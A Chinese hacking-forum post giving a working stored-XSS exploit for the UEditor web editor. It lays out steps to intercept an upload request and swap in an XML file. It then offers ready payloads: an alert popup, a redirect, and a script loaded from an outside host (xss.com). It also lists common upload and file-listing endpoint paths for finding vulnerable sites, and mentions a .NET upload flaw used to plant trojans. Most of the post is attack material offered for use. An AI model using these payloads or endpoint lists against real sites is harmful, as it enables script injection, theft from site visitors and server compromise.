大神论坛

找回密码
快速注册
查看: 420 | 回复: 0

[原创] UEditor 富文本web编辑器最新漏洞版XML文件上传导致存储型XSS

digest

主题

帖子

5

积分

初入江湖

UID
39
积分
5
精华
威望
10 点
违规
大神币
68 枚
注册时间
2021-05-03 08:20
发表于 2021-06-19 13:41
本帖最后由 lkyy 于 2021-06-19 13:41 编辑

一、Ueditor最新版XML文件上传导致存储型XSS

测试版本:php v1.4.3.3

下载地址:https://github.com/fex-team/ueditor 复现步骤:

1. 上传一个图片文件

2. 然后buprsuit抓包拦截

 3.uploadimage类型改为uploadfile,并修改文件后缀名为xml,最后复制上xml代码即可

4. 即可弹出xss

请注意controller.xxx的访问路径
http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

常见的xml弹窗POC:
弹窗xss:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>

URL跳转:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>

远程加载Js:

<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>

常用的上传路径:

/ueditor/index.html
/ueditor/asp/controller.asp?action=uploadimage
/ueditor/asp/controller.asp?action=uploadfile
/ueditor/net/controller.ashx?action=uploadimage
/ueditor/net/controller.ashx?action=uploadfile
/ueditor/php/controller.php?action=uploadfile
/ueditor/php/controller.php?action=uploadimage
/ueditor/jsp/controller.jsp?action=uploadfile
/ueditor/jsp/controller.jsp?action=uploadimage

常用列出获取路径:

/ueditor/net/controller.ashx?action=listfile
/ueditor/net/controller.ashx?action=listimage

二、文件上传漏洞

1. NET版本文件上传

该任意文件上传漏洞存在于1.4.3.31.5.01.3.6版本中,并且只有**.NET**版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器。